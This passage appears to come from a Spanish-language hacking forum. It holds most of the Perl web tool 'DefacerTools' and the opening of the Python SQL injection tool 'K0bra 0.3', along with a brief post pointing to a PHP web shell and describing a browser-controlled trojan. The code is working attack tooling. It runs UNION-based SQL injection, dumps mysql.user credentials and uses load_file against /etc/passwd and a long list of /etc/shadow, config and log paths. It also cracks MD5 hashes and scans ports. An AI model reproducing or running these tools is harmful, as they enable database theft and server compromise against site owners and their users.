= toma( "http://" . $auth . $parche ); if ( $code =~ /Index of (.*)</ig ) { my $dir_found = $1; chomp $dir_found; print "[+] Directory Found : $page/$dir_found<br>"; } } } } } print "<br><br>[+]Finished<br>"; copyright(); } elsif ( $rta{'sqliscanner'} ) { logocuatro(); print qq(<form method=post action=''><b>Page : </b><input type=text name=buscarsql value=http://localhost/sql.php?id=><input type=submit name=codificar value=Scan></form>); copyright(); } elsif ( $rta{'buscarsql'} ) { logocuatro(); print "<br><br>[+] Scanning page<br><br>"; &length( $rta{'buscarsql'} ); print "<br><br>[+] Finished"; copyright(); } elsif ( $rta{'fuzzdns'} ) { logocinco(); print qq(<form method=post action=''><b>Host : </b><input type=text name=buscardns value=google.com><input type=submit name=codificar value=Scan></form>); copyright(); } elsif ( $rta{'buscardns'} ) { logocinco(); my $page = $rta{'buscardns'}; print "<br><br>[+] Searching DNS to " . $page . ".....<br><br><br>"; for my $path (@dns) { $code = tomax( "http://" . $path . "." . $page ); if ( $code->is_success ) { print "[+] Found : http://" . $path . "." . $page . "<br>"; } } print "<br><br>[+] Finished<br><br>"; copyright(); } elsif ( $rta{'finderpass'} ) { logoseis(); print qq(<form method=post action=''><b>MD5 : </b><input type=text name=buscarhash value=202cb962ac59075b964b07152d234b70><input type=submit name=codificar value=Scan></form>); copyright(); } elsif ( $rta{'buscarhash'} ) { logoseis(); &crackit( $rta{'buscarhash'} ); copyright(); } elsif ( $rta{'portscanner'} ) { logosiete(); print qq(<form method=post action=''><b>IP : </b><input type=text name=buscarpuertos value=localhost><input type=submit name=codificar value=Scan></form>); copyright(); } elsif ( $rta{'buscarpuertos'} ) { logosiete(); scanuno( $rta{'buscarpuertos'} ); copyright(); } elsif ( $rta{'home'} ) { sintax(); } else { sintax(); } sub sintax { print qq( <title>DefacerTools 0.5 (C) Doddy Hackman 2012</title> <br><br> <h1><center>DefacerTools</center></h1> <br><br> <center> <table border=1> <td class=main><center><b>Tools</b></center></td><tr> <td class=main><a href=?hex=true><center>HexConverter</center></a></td><tr> <td class=main><a href=?panelfinder=true><center>PanelFinder</center></a></td><tr> <td class=main><a href=?pathsfinder=true><center>PathsFinder</center></a></td><tr> <td class=main><a href=?sqliscanner=true><center>SQLi Scanner</center></a></td><tr> <td class=main><a href=?fuzzdns=true><center>FuzzDNS</center></a></td><tr> <td class=main><a href=?finderpass=true><center>FinderPass</center></a></td><tr> <td class=main><a href=?portscanner=true><center>PortScanner</center></a></td> </table> </center> ); } sub logouno { print qq( <center> <pre> @ @ @@@@ @ @ @ @ @ @ @ @ @ @ @ @@@ @ @ @ @@@ @ @@ @ @ @@@ @@ @@ @@@ @@ @@@@@@ @ @ @ @ @ @ @ @@ @ @ @ @ @ @ @ @ @ @ @ @ @@@@@ @@ @ @ @ @ @ @ @ @@@@@ @ @ @@@@@ @ @ @ @ @@ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @@@ @ @ @@@@ @@@ @ @ @ @@@ @ @ @@@ @ </pre> ); } sub logodos { print qq( <center> <pre> @@@@@ @ @@@@@ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @@@ @ @@ @@@ @ @ @ @ @@ @@@@ @@@ @@ @@@@@ @ @@ @ @ @ @ @@@@ @ @@ @ @ @ @ @ @ @ @@@@ @ @ @@@@@ @ @ @ @ @ @ @ @@@@@ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @@@@ @ @ @@@ @ @ @ @ @ @@@@ @@@ @ </pre> ); } sub logotres { print qq( <center> <pre> @@@@@ @ @@@@@ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @@@ @@ @ @@ @@ @ @ @ @@ @@@@ @@@ @@ @@@@@ @ @ @@ @ @ @ @@@@ @ @@ @ @ @ @ @ @ @ @@@@ @ @ @ @ @ @ @ @ @ @ @@@@@ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @@@@ @ @ @ @@ @ @ @ @ @@@@ @@@ @ </pre> ); } sub logocuatro { print qq( <center> <pre> @@@ @@@@ @ @ @@@ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @@@ @@@ @ @@ @ @@ @@@ @@ @@@ @ @ @ @ @@@ @ @ @ @@ @ @@ @ @ @ @ @ @ @ @ @ @ @ @@@@ @ @ @ @ @@@@@ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @@ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @@@ @@@@ @@@@@ @ @@@ @@@ @@@@ @ @ @ @ @@@ @ @ </pre> ); } sub logocinco { print qq( <center> <pre> @@@@@ @@@@ @ @ @@@ @ @ @ @@ @ @ @ @ @ @ @@ @ @ @ @ @ @@@@ @@@@ @ @ @ @ @ @ @@@@ @ @ @ @ @ @ @ @ @ @@@ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @@ @ @ @ @@ @ @ @ @ @ @@ @ @ @ @@ @ @@@@ @@@@ @@@@ @ @ @@@ </pre> ); } sub logoseis { print qq( <center> <pre> @@@@@ @ @ @@@@@ @ @ @ @ @ @ @ @ @ @ @ @@ @@@@ @@@ @@ @ @ @@@ @@ @@ @@@@ @ @@ @ @ @ @ @ @ @@@@@ @ @ @ @ @ @ @ @ @ @ @ @@@@@ @ @ @@@@ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @@@@ @@@ @ @ @@@@ @@ @@ </pre> ); } sub logosiete { print qq( <center> <pre> @@@@@ @@@ @ @ @ @ @ @ @ @ @ @ @ @@@ @@ @@ @ @@@ @@@ @ @@ @ @@ @@@ @@ @@@@@ @ @ @ @ @@@ @ @ @ @@ @ @@ @ @ @ @ @ @ @ @ @ @ @ @@@@ @ @ @ @ @@@@@ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @@@ @ @ @@@ @@@ @@@@ @ @ @ @ @@@ @ </pre> ); } sub copyright { print qq(<br><br><br><br><br><br><br><center><a href=?home=true><b>Return to home</b></a></center><br><br>); } sub length { print "<br>[+] Looking for the number of columns<br><br>"; my $rows = "0"; my $asc; my $page = $_[0]; ( $pass1, $pass2 ) = &bypass( $_[1] ); $alert = "char(" . ascii("RATSXPDOWN1RATSXPDOWN") . ")"; $total = "1"; for my $rows ( 2 .. 200 ) { $asc .= "," . "char(" . ascii( "RATSXPDOWN" . $rows . "RATSXPDOWN" ) . ")"; $total .= "," . $rows; $injection = $page . "1" . $pass1 . "and" . $pass1 . "1=0" . $pass1 . "union" . $pass1 . "select" . $pass1 . $alert . $asc; $test = toma($injection); if ( $test =~ /RATSXPDOWN/ ) { @number = $test =~ m{RATSXPDOWN(\d+)RATSXPDOWN}g; $control = 1; my ( $scheme, $auth, $path, $query, $frag ) = uri_split( $_[0] ); my $save = $auth; $total =~ s/$number[0]/hackman/; print "[SQLI] : " . $page . "1" . $pass1 . "and" . $pass1 . "1=0" . $pass1 . "union" . $pass1 . "select" . $pass1 . $total . "<br>"; details( $page . "1" . $pass1 . "and" . $pass1 . "1=0" . $pass1 . "union" . $pass1 . "select" . $pass1 . $total, "--", "" ); } } } sub details { my ( $page, $bypass, $save ) = @_; ( $pass1, $pass2 ) = &bypass($bypass); if ( $page =~ /(.*)hackman(.*)/ig ) { print "<br>[+] Searching information..<br><br>"; my ( $start, $end ) = ( $1, $2 ); $inforschema = $start . "unhex(hex(concat(char(69,82,84,79,82,56,53,52))))" . $end . $pass1 . "from" . $pass1 . "information_schema.tables" . $pass2; $mysqluser = $start . "unhex(hex(concat(char(69,82,84,79,82,56,53,52))))" . $end . $pass1 . "from" . $pass1 . "mysql.user" . $pass2; $test3 = toma( $start . "unhex(hex(concat(char(69,82,84,79,82,56,53,52),load_file(0x2f6574632f706173737764))))" . $end . $pass2 ); $test1 = toma($inforschema); $test2 = toma($mysqluser); if ( $test2 =~ /ERTOR854/ig ) { print "[mysql.user] : ON<br>"; } else { print "[mysql.user] : OFF<br>"; } if ( $test1 =~ /ERTOR854/ig ) { print "[information_schema.tables] : ON<br>"; } else { print "[information_schema.tables] : OFF<br>"; } if ( $test3 =~ /ERTOR854/ig ) { print "[load_file] : ON<br>"; } $concat = "unhex(hex(concat(char(69,82,84,79,82,56,53,52),version(),char(69,82,84,79,82,56,53,52),database(),char(69,82,84,79,82,56,53,52),user(),char(69,82,84,79,82,56,53,52))))"; $injection = $start . $concat . $end . $pass2; $code = toma($injection); if ( $code =~ /ERTOR854(.*)ERTOR854(.*)ERTOR854(.*)ERTOR854/g ) { print "<br>[!] DB Version : $1<br>[!] DB Name : $2<br>[!] user_name : $3<br><br>"; } else { print "<br>[-] Not found any data<br>"; } } } sub encode { my $string = $_[0]; $hex = '0x'; for ( split //, $string ) { $hex .= sprintf "%x", ord; } return $hex; } sub bypass { if ( $_[0] eq "/*" ) { return ( "/**/", "/**/" ); } elsif ( $_[0] eq "%20" ) { return ( "%20", "%00" ); } else { return ( "+", "--" ); } } sub ascii { return join ',', unpack "U*", $_[0]; } sub toma { return $nave->get( $_[0] )->content; } sub tomax { return $nave->get( $_[0] ); } sub get_links { $test = HTML::LinkExtor->new( \&agarrar )->parse( $_[0] ); return @links; sub agarrar { my ( $a, %b ) = @_; push( @links, values %b ); } } sub crackit { my $secret = $_[0]; print "<br><br>[+] Cracking $_[0]<br><br>"; my %hash = ( 'http://passcracking.com/' => { 'tipo' => 'post', 'variables' => '{"datafromuser" => $_[0], "submit" => "DoIT"}', 'regex' => '<\/td><td>md5 Database<\/td><td>$_[0]<\/td><td bgcolor=#FF0000>(.*)<\/td><td>', }, 'http://md5.hashcracking.com/search.php?md5=' => { 'tipo' => 'get', 'regex' => 'Cleartext of $_[0] is (.*)', }, 'http://www.bigtrapeze.com/md5/' => { 'tipo' => 'post', 'variables' => '{"query" => $_[0], "submit" => " Crack "}', 'regex' => 'The hash <strong>$_[0]<\/strong> has been deciphered to: <strong>(.+)<\/strong>', }, 'http://opencrack.hashkiller.com/' => { 'tipo' => 'post', 'variables' => '{"oc_check_md5" => $_[0], "submit" => "Search MD5"}', 'regex' => qq(<\/div><div class="result">$_[0]:(.+)<br\/>), }, 'http://www.hashchecker.com/index.php?_sls=search_hash' => { 'tipo' => 'post', 'variables' => '{"search_field" => $_[0], "Submit" => "search"}', 'regex' => '<td><li>Your md5 hash is :<br><li>$_[0] is <b>(.*)<\/b> used charl', }, 'http://victorov.su/md5/?md5e=&md5d=' => { 'tipo' => 'get', 'regex' => qq(MD5 ðàñøèôðîâàí: <b>(.*)<\/b><br><form action=\"\">), } ); for my $data ( keys %hash ) { if ( $hash{$data}{tipo} eq "get" ) { $code = toma( $data . $_[0] ); if ( $code =~ /$hash{$data}{regex}/ig ) { print "<br>[+] Decoded : " . $1 . "<br><br>"; print $secret. ":" . $1 . "<br>"; } } else { $code = tomar( $data, $hash{$data}{variables} ); if ( $code =~ /$hash{$data}{regex}/ig ) { print $secret. ":" . $1 . "<br>"; } } } print "<br>[+] Finish<br>"; } sub tomar { my ( $web, $var ) = @_; return $nave->post( $web, [ %{$var} ] )->content; } sub scanuno { my %ports = ( "21" => "ftp", "22" => "ssh", "25" => "smtp", "80" => "http", "110" => "pop3", "3306" => "mysql" ); print "<br>[+] Scanning $_[0]<br><br><br>"; for my $port ( keys %ports ) { if ( new IO::Socket::INET( PeerAddr => $_[0], PeerPort => $port, Proto => "tcp", Timeout => 0.5 ) ) { print "[Port] : " . $port . " [Service] : " . $ports{$port} . "<br>"; } } print "<br><br>[+] Scan Finish<br>"; } # The End ?

#429

Scripting / Re: [Perl] Commander

9 Diciembre 2011, 15:06 PM

yo hice una phpshell llamada poisonshell , tiene lo que buscas , solo es cuestion de buscarla en google , la version 1.0 de mi shell esta aca.

http://pastebin.com/FM7j0w7N

eso si lo que buscas es algo como commander pero que pida password no te puedo ayudar porque tendria que hacer una nueva version de este programa , otra cosa espero que tengas en cuenta que commander es solo un troyano que se maneja por navegador , no tiene nada que ver con phpshells,c99,r57.

#430

Scripting / [Python] K0bra 0.3

3 Diciembre 2011, 16:35 PM

Un completo scanner SQLI hecho en python

Las funciones son las siguientes

Comprobar vulnerabilidad
Buscar numero de columnas
Buscar automaticamente el numero para mostrar datos
Mostras tablas
Mostrar columnas
Mostrar bases de datos
Mostrar tablas de otra DB
Mostrar columnas de una tabla de otra DB
Mostrar usuarios de mysql.user
Buscar archivos usando load_file
Mostrar un archivo usando load_file
Mostrar valores
Mostrar informacion sobre la DB
Crear una shell usando outfile
Todo se guarda en logs ordenados
Manejo de control+c

Código (python) [Seleccionar] Expandir
#!usr/bin/python #k0bra 0.3 (C) Doddy Hackman 2011 import os,sys,urllib2,re,binascii from urlparse import urlparse files = ["/etc/passwd","C:/xampp/htdocs/aca.txt","C:/xampp/htdocs/aca.txt","C:/xampp/htdocs/admin.php","C:/xampp/htdocs/leer.txt","../../../boot.ini","../../../../boot.ini","../../../../../boot.ini","../../../../../../boot.ini","/etc/shadow","/etc/shadow~","/etc/hosts","/etc/motd","/etc/apache/apache.conf","/etc/fstab","/etc/apache2/apache2.conf","/etc/apache/httpd.conf","/etc/httpd/conf/httpd.conf","/etc/apache2/httpd.conf","/etc/apache2/sites-available/default","/etc/mysql/my.cnf","/etc/my.cnf","/etc/sysconfig/network-scripts/ifcfg-eth0","/etc/redhat-release","/etc/httpd/conf.d/php.conf","/etc/pam.d/proftpd","/etc/phpmyadmin/config.inc.php","/var/www/config.php","/etc/httpd/logs/error_log","/etc/httpd/logs/error.log","/etc/httpd/logs/access_log","/etc/httpd/logs/access.log","/var/log/apache/error_log","/var/log/apache/error.log","/var/log/apache/access_log","/var/log/apache/access.log","/var/log/apache2/error_log","/var/log/apache2/error.log","/var/log/apache2/access_log","/var/log/apache2/access.log","/var/www/logs/error_log","/var/www/logs/error.log","/var/www/logs/access_log","/var/www/logs/access.log","/usr/local/apache/logs/error_log","/usr/local/apache/logs/error.log","/usr/local/apache/logs/access_log","/usr/local/apache/logs/access.log","/var/log/error_log","/var/log/error.log","/var/log/access_log","/var/log/access.log","/etc/group","/etc/security/group","/etc/security/passwd","/etc/security/user","/etc/security/environ","/etc/security/limits","/usr/lib/security/mkuser.default","/apache/logs/access.log","/apache/logs/error.log","/etc/httpd/logs/acces_log","/etc/httpd/logs/acces.log","/var/log/httpd/access_log","/var/log/httpd/error_log","/apache2/logs/error.log","/apache2/logs/access.log","/logs/error.log","/logs/access.log","/usr/local/apache2/logs/access_log","/usr/local/apache2/logs/access.log","/usr/local/apache2/logs/error_log","/usr/local/apache2/logs/error.log","/var/log/httpd/access.log","/var/log/httpd/error.log","/opt/lampp/logs/access_log","/opt/lampp/logs/error_log","/opt/xampp/logs/access_log","/opt/xampp/logs/error_log","/opt/lampp/logs/access.log","/opt/lampp/logs/error.log","/opt/xampp/logs/access.log","/opt/xampp/logs/error.log","C:\\ProgramFiles\\ApacheGroup\\Apache\\logs\\access.log","C:\\ProgramFiles\\ApacheGroup\\Apache\\logs\\error.log","/usr/local/apache/conf/httpd.conf","/usr/local/apache2/conf/httpd.conf","/etc/apache/conf/httpd.conf","/usr/local/etc/apache/conf/httpd.conf","/usr/local/apache/httpd.conf","/usr/local/apache2/httpd.conf","/usr/local/httpd/conf/httpd.conf","/usr/local/etc/apache2/conf/httpd.conf","/usr/local/etc/httpd/conf/httpd.conf","/usr/apache2/conf/httpd.conf","/usr/apache/conf/httpd.conf","/usr/local/apps/apache2/conf/httpd.conf","/usr/local/apps/apache/conf/httpd.conf","/etc/apache2/conf/httpd.conf","/etc/http/conf/httpd.conf","/etc/httpd/httpd.conf","/etc/http/httpd.conf","/etc/httpd.conf","/opt/apache/conf/httpd.conf","/opt/apache2/conf/httpd.conf","/var/www/conf/httpd.conf","/private/etc/httpd/httpd.conf","/private/etc/httpd/httpd.conf.default","/Volumes/webBackup/opt/apache2/conf/httpd.conf","/Volumes/webBackup/private/etc/httpd/httpd.conf","/Volumes/webBackup/private/etc/httpd/httpd.conf.default","C:\\ProgramFiles\\ApacheGroup\\Apache\\conf\\httpd.conf","C:\\ProgramFiles\\ApacheGroup\\Apache2\\conf\\httpd.conf","C:\\ProgramFiles\\xampp\\apache\\conf\\httpd.conf","/usr/local/php/httpd.conf.php","/usr/local/php4/httpd.conf.php","/usr/local/php5/httpd.conf.php","/usr/local/php/httpd.conf","/usr/local/php4/httpd.conf","/usr/local/php5/httpd.conf","/Volumes/Macintosh_HD1/opt/httpd/conf/httpd.conf","/Volumes/Macintosh_HD1/opt/apache/conf/httpd.conf","/Volumes/Macintosh_HD1/opt/apache2/conf/httpd.conf","/Volumes/Macintosh_HD1/usr/local/php/httpd.conf.php","/Volumes/Macintosh_HD1/usr/local/php4/httpd.conf.php","/Volumes/Macintosh_HD1/usr/local/php5/httpd.conf.php","/usr/local/etc/apache/vhosts.conf","/etc/php.ini","/bin/php.ini","/etc/httpd/php.ini","/usr/lib/php.ini","/usr/lib/php/php.ini","/usr/local/etc/php.ini","/usr/local/lib/php.ini","/usr/local/php/lib/php.ini","/usr/local/php4/lib/php.ini","/usr/local/php5/lib/php.ini","/usr/local/apache/conf/php.ini","/etc/php4.4/fcgi/php.ini","/etc/php4/apache/php.ini","/etc/php4/apache2/php.ini","/etc/php5/apache/php.ini","/etc/php5/apache2/php.ini","/etc/php/php.ini","/etc/php/php4/php.ini","/etc/php/apache/php.ini","/etc/php/apache2/php.ini","/web/conf/php.ini","/usr/local/Zend/etc/php.ini","/opt/xampp/etc/php.ini","/var/local/www/conf/php.ini","/etc/php/cgi/php.ini","/etc/php4/cgi/php.ini","/etc/php5/cgi/php.ini","c:\\php5\\php.ini","c:\\php4\\php.ini","c:\\php\\php.ini","c:\\PHP\\php.ini","c:\\WINDOWS\\php.ini","c:\\WINNT\\php.ini","c:\\apache\\php\\php.ini","c:\\xampp\\apache\\bin\\php.ini","c:\\NetServer\\bin\\stable\\apache\\php.ini","c:\\home2\\bin\\stable\\apache\\php.ini","c:\\home\\bin\\stable\\apache\\php.ini","/Volumes/Macintosh_HD1/usr/local/php/lib/php.ini","/usr/local/cpanel/logs","/usr/local/cpanel/logs/stats_log","/usr/local/cpanel/logs/access_log","/usr/local/cpanel/logs/error_log","/usr/local/cpanel/logs/license_log","/usr/local/cpanel/logs/login_log","/var/cpanel/cpanel.config","/var/log/mysql/mysql-bin.log","/var/log/mysql.log","/var/log/mysqlderror.log","/var/log/mysql/mysql.log","/var/log/mysql/mysql-slow.log","/var/mysql.log","/var/lib/mysql/my.cnf","C:\\ProgramFiles\\MySQL\\MySQLServer5.0\\data\\hostname.err","C:\\ProgramFiles\\MySQL\\MySQLServer5.0\\data\\mysql.log","C:\\ProgramFiles\\MySQL\\MySQLServer5.0\\data\\mysql.err","C:\\ProgramFiles\\MySQL\\MySQLServer5.0\\data\\mysql-bin.log","C:\\ProgramFiles\\MySQL\\data\\hostname.err","C:\\ProgramFiles\\MySQL\\data\\mysql.log","C:\\ProgramFiles\\MySQL\\data\\mysql.err","C:\\ProgramFiles\\MySQL\\data\\mysql-bin.log","C:\\MySQL\\data\\hostname.err","C:\\MySQL\\data\\mysql.log","C:\\MySQL\\data\\mysql.err","C:\\MySQL\\data\\mysql-bin.log","C:\\ProgramFiles\\MySQL\\MySQLServer5.0\\my.ini","C:\\ProgramFiles\\MySQL\\MySQLServer5.0\\my.cnf","C:\\ProgramFiles\\MySQL\\my.ini","C:\\ProgramFiles\\MySQL\\my.cnf","C:\\MySQL\\my.ini","C:\\MySQL\\my.cnf","/etc/logrotate.d/proftpd","/www/logs/proftpd.system.log","/var/log/proftpd","/etc/proftp.conf","/etc/protpd/proftpd.conf","/etc/vhcs2/proftpd/proftpd.conf","/etc/proftpd/modules.conf","/var/log/vsftpd.log","/etc/vsftpd.chroot_list","/etc/logrotate.d/vsftpd.log","/etc/vsftpd/vsftpd.conf","/etc/vsftpd.conf","/etc/chrootUsers","/var/log/xferlog","/var/adm/log/xferlog","/etc/wu-ftpd/ftpaccess","/etc/wu-ftpd/ftphosts","/etc/wu-ftpd/ftpusers","/usr/sbin/pure-config.pl","/usr/etc/pure-ftpd.conf","/etc/pure-ftpd/pure-ftpd.conf","/usr/local/etc/pure-ftpd.conf","/usr/local/etc/pureftpd.pdb","/usr/local/pureftpd/etc/pureftpd.pdb","/usr/local/pureftpd/sbin/pure-config.pl","/usr/local/pureftpd/etc/pure-ftpd.conf","/etc/pure-ftpd/pure-ftpd.pdb","/etc/pureftpd.pdb","/etc/pureftpd.passwd","/etc/pure-ftpd/pureftpd.pdb","/var/log/pure-ftpd/pure-ftpd.log","/logs/pure-ftpd.log","/var/log/pureftpd.log","/var/log/ftp-proxy/ftp-proxy.log","/var/log/ftp-proxy","/var/log/ftplog","/etc/logrotate.d/ftp","/etc/ftpchroot","/etc/ftphosts","/var/log/exim_mainlog","/var/log/exim/mainlog","/var/log/maillog","/var/log/exim_paniclog","/var/log/exim/paniclog","/var/log/exim/rejectlog","/var/log/exim_rejectlog"] def installer(): try: os.mkdir("logs",0777) except: pass def clean(): if sys.platform=="win32": os.system("cls") else: os.system("clear") def savefile(name,text): file = open(name,"a") file.write("\n"+text) file.close() def gethost(test): return urlparse(test).netloc def header() : print "" print "" print " @ @@ @ " print "@@ @ @ @@ " print " @ @@ @ @ @ @ @ @ @@@ " print " @ @ @ @ @@ @ @@@ @ @ " print " @@ @ @ @ @ @ @@@ " print " @ @ @ @ @ @ @ @ @ " print "@@@ @ @@ @@@ @@@ @@@@@" print "" print "" def copyright() : print "\n\n(C) Doddy Hackman 2010\n" def show() : print "\n[*] Sintax : ",sys.argv[0]," <web>\n" def toma(web) : nave = urllib2.Request(web) nave.add_header('User-Agent','Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.5) Gecko/2008120122 Firefox/3.0.5'); op = urllib2.build_opener() return op.open(nave).read() def bypass(bypass): if bypass == "--": return("+","--") elif bypass == "/*": return("/**/","/**/") else: return("+","--") def reiniciar(): copyright() raw_input() sta() def dumper(web,passx,table,col1,col2): pass1,pass2 = bypass(passx) web1 = re.sub("hackman","unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))",web) web2 = re.sub("hackman","unhex(hex(concat(0x4b30425241,"+col1+",0x4b30425241,0x4B3042524131,"+col2+",0x4B3042524131)))",web) code1 = toma(web1+pass1+"from"+pass1+table+pass2) print "\n\n[+] Searching values\n\n" if (re.findall("K0BRA(.*?)K0BRA",code1)): numbers = re.findall("K0BRA(.*?)K0BRA",code1) numbers = numbers[0] savefile("logs/"+gethost(web)+".txt","") savefile("logs/"+gethost(web)+".txt","[+] Values Found in table "+table+" : "+numbers+"\n") print "[+] Values Found : ",numbers,"\n" for counter in range(0,int(numbers)): code2 = toma(web2+pass1+"from"+pass1+table+pass1+"limit"+pass1+repr(counter)+",1"+pass2) if (re.findall("K0BRA(.*?)K0BRA",code2)): c1 = re.findall("K0BRA(.*?)K0BRA",code2) c1 = c1[0] c2 = re.findall("K0BRA1(.*?)K0BRA1",code2) c2 = c2[0] print "["+col1+"] : "+c1 print "["+col2+"] : "+c2+"\n" savefile("logs/"+gethost(web)+".txt","["+col1+"] : "+c1) savefile("logs/"+gethost(web)+".txt","["+col2+"] : "+c2+"\n") else: print "[-] Not Found\n" def mysqluser(web,passx): pass1,pass2 = bypass(passx) web1 = re.sub("hackman","unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))",web) web2 = re.sub("hackman","unhex(hex(concat(0x4b30425241,Host,0x4b30425241,0x4B3042524131,User,0x4B3042524131,0x4B3042524132,Password,0x4B3042524132)))",web) code1 = toma(web1+pass1+"from"+pass1+"mysql.user"+pass2) print "\n\n[+] Searching mysql.user\n\n" if (re.findall("K0BRA(.*?)K0BRA",code1)): numbers = re.findall("K0BRA(.*?)K0BRA",code1) numbers = numbers[0] print "[+] mysql.user : ON" savefile("logs/"+gethost(web)+".txt","") savefile("logs/"+gethost(web)+".txt","[+] mysql.user : ON") savefile("logs/"+gethost(web)+".txt","[+] Users Found : "+numbers+"\n") print "[+] Users Found : ",numbers,"\n" for counter in range(0,int(numbers)): code2 = toma(web2+pass1+"from"+pass1+"mysql.user"+pass1+"limit"+pass1+repr(counter)+",1"+pass2) if (re.findall("K0BRA(.*?)K0BRA",code2)): host = re.findall("K0BRA(.*?)K0BRA",code2) host = host[0] user = re.findall("K0BRA1(.*?)K0BRA1",code2) user = user[0] passw = re.findall("K0BRA2(.*?)K0BRA2",code2) passw = passw[0] savefile("logs/"+gethost(web)+".txt","[Host] : "+host) savefile("logs/"+gethost(web)+".txt","[User] : "+user) savefile("logs/"+gethost(web)+".txt","[Pass] : "+passw+"\n") print "[Host] : "+host print "[User] : "+user print "[Pass] : "+passw+"\n" else: print "[-] Not Found\n" def showcolumnsdb(web,db,table,passx): db2 = db table2 = table db = "0x"+str(binascii.hexlify(db)) table = "0x"+str(binascii.hexlify(table)) pass1,pass2 = bypass(passx) savefile("logs/"+gethost(web)+".txt","") web1 = re.sub("hackman","unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))",web) web2 = re.sub("hackman","unhex(hex(concat(0x4b30425241,column_name,0x4b30425241)))",web) code1 = toma(web1+pass1+"from"+pass1+"information_schema.columns"+pass1+"where"+pass1+"table_name="+table+pass1+"and"+pass1+"table_schema="+db+pass2) print "\n\n[+] Searching columns in DB\n\n" if (re.findall("K0BRA(.*?)K0BRA",code1)): numbers = re.findall("K0BRA(.*?)K0BRA",code1) numbers = numbers[0] print "[+] information_schema : ON" print "[+] Columns Found : ",numbers,"\n" for counter in range(0,int(numbers)): code2 = toma(web2+pass1+"from"+pass1+"information_schema.columns"+pass1+"where"+pass1+"table_name="+table+pass1+"and"+pass1+"table_schema="+db+pass1+"limit"+pass1+repr(counter)+",1"+pass2) if (re.findall("K0BRA(.*?)K0BRA",code2)): column = re.findall("K0BRA(.*?)K0BRA",code2) column = column[0] savefile("logs/"+gethost(web)+".txt","[Column Found in table "+table2+" in DB "+table2+"] : "+column) print "[Column Found] : "+column else: print "[-] Not Found\n" def showtablesdb(web,db,passx): db2 = db db = "0x"+str(binascii.hexlify(db)) pass1,pass2 = bypass(passx) savefile("logs/"+gethost(web)+".txt","") web1 = re.sub("hackman","unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))",web) web2 = re.sub("hackman","unhex(hex(concat(0x4b30425241,table_name,0x4b30425241)))",web) code1 = toma(web1+pass1+"from"+pass1+"information_schema.tables"+pass1+"where"+pass1+"table_schema="+db+pass2) print "\n\n[+] Searching tables in DB\n\n" if (re.findall("K0BRA(.*?)K0BRA",code1)): numbers = re.findall("K0BRA(.*?)K0BRA",code1) numbers = numbers[0] print "[+] information_schema : ON" print "[+] Tables Found : ",numbers,"\n" for counter in range(0,int(numbers)): code2 = toma(web2+pass1+"from"+pass1+"information_schema.tables"+pass1+"where"+pass1+"table_schema="+db+pass1+"limit"+pass1+repr(counter)+",1"+pass2) if (re.findall("K0BRA(.*?)K0BRA",code2)): table = re.findall("K0BRA(.*?)K0BRA",code2) table = table[0] print "[Table Found] : "+table savefile("logs/"+gethost(web)+".txt","[Table Found in DB "+db2+"] : "+table) else: print "[-] Not Found\n" def showtables(web,passx): pass1,pass2 = bypass(passx) web1 = re.sub("hackman","unhex(hex(concat(0x4b30425241,count(table_name),0x4b30425241)))",web) web2 = re.sub("hackman","unhex(hex(concat(0x4b30425241,table_name,0x4b30425241)))",web) code1 = toma(web1+pass1+"from"+pass1+"information_schema.tables"+pass2) print "\n\n[+] Searching tables\n\n" if (re.findall("K0BRA(.*?)K0BRA",code1)): savefile("logs/"+gethost(web)+".txt","") numbers = re.findall("K0BRA(.*?)K0BRA",code1) numbers = numbers[0] print "[+] information_schema : ON" print "[+] Tables Found : ",numbers,"\n" for counter in range(17,int(numbers)): code2 = toma(web2+pass1+"from"+pass1+"information_schema.tables"+pass1+"limit"+pass1+repr(counter)+",1"+pass2) if (re.findall("K0BRA(.*?)K0BRA",code2)): table = re.findall("K0BRA(.*?)K0BRA",code2) table = table[0] print "[Table Found] : "+table savefile("logs/"+gethost(web)+".txt","[Table Found] : "+table) else: print "[-] Not Found\n" def showcolumns(tabla,web,passx): pass1,pass2 = bypass(passx) tabla2 = tabla tabla = "0x"+str(binascii.hexlify(tabla)) web1 = re.sub("hackman","unhex(hex(concat(0x4b30425241,count(column_name),0x4b30425241)))",web) web2 = re.sub("hackman","unhex(hex(concat(0x4b30425241,column_name,0x4b30425241)))",web) code1 = toma(web1+pass1+"from"+pass1+"information_schema.columns"+pass1+"where"+pass1+"table_name="+tabla+pass2) print "\n\n[+] Searching columns\n\n" if (re.findall("K0BRA(.*?)K0BRA",code1)): savefile("logs/"+gethost(web)+".txt","") numbers = re.findall("K0BRA(.*?)K0BRA",code1) numbers = numbers[0] print "[+] information_schema : ON" print "[+] Columns Found : ",numbers,"\n" for counter in range(0,int(numbers)): code2 = toma(web2+pass1+"from"+pass1+"information_schema.columns"+pass1+"where"+pass1+"table_name="+tabla+pass1+"limit"+pass1+repr(counter)+",1"+pass2) if (re.findall("K0BRA(.*?)K0BRA",code2)): column = re.findall("K0BRA(.*?)K0BRA",code2) column = column[0] print "[Column Found in table "+tabla2+"] : "+column savefile("logs/"+gethost(web)+".txt","[Column Found in table "+tabla2+"] : "+column) else: print "[-] Not Found\n" def showdbs(web,passx): pass1,pass2 = bypass(passx) web1 = 